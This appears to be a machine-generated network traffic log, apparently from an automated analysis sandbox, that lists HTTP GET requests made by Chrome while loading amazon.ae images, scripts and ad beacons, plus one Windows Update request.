    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71U06Q9P9YL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71NMAGNrkiL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619pZrUnkWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81K5-xh1dIL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71VOSLOz4+L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/710sizyJOdL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71ApD6of+QL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31N-r+VYSWL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81OdMnlnPlL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ih/1722546148000/inner-host.min.js HTTP/1.1Host: d1lxz4vuik53pc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/91fwcCc9bVL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+GmgovDSPBzpvFk&MD=gD7TEatm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /images/I/11mVszy8FIL.js?AUIClients/AmazonRushAssetLoader HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21cuxCuJB9L.js?AUIClients/AmazonRushRouter HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41k9TQrnHzL.js?AUIClients/AmazonRushFramework HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/x-locale/common/grey-pixel.gif HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1741561_3919943_379x304_1X_en_AE._SY304_CB566685890_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C61xJcNKKLXL.js,11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/889509ef-90c0-4959-bd54-1a1faad422c6._CR0,0,700,700_AC_SX175_SY100_QL70_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JHu0Cp_6xtUcAjkkSpr-8WAAAAGRdjLkOQMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCMSks0 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JAdwMenK-Lr6goco_zSS1gcAAAGRdjLkNgMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICB-RDUN HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JHmX5NPJ7V2JK051HMLo-qcAAAGRdjLk1wMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICCwJel0 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JP9UG7VQZht7NRTb3weJQcEAAAGRdjLk2AMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICAysaqX HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/MV5yNztdnPUc5FB.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61Mmgk68miL._AC_UL640_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
